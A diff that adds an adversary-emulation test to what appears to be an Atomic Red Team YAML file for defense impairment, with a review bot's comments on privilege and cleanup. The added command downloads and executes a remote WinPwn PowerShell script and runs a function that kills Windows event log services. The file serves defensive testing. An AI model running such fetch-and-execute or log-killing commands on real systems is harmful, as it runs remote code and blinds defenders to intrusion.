diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml
index 36b02dd0..e40b7c59 100644
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -633,4 +633,13 @@ atomic_tests:
 command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
 name: powershell
 elevation_required: true
-
+- name: WinPwn - Kill the event log services for stealth
+ description: Kill the event log services for stealth via function of WinPwn
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+ inv-phantom -consoleoutput -noninteractive
+ name: powershell
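Review bot: The new test declares no `elevation_required` and no `cleanup_command`, although the preceding Backstab test in the same hunk carries `elevation_required: true` and, going by the description, terminating the event log service presumably needs the same privilege; without a cleanup step the host is left with logging disabled after the executor finishes. I would add `elevation_required: true` alongside `supported_platforms`, and a `cleanup_command` under `executor` that restarts the event log service (for example `Restart-Service EventLog` — confirm that a restart is enough to recover after the threads are killed), so a defender running the atomic regains the telemetry the test removes. The first command line assigns `$S3cur3Th1sSh1t_repo` but nothing in the block reads it, so it can be dropped. Pinning the downloaded script to the full commit hash rather than a branch is the right call and should be kept, since it makes the executed code reproducible. The enclosing `atomic_tests` sequence starts before this hunk.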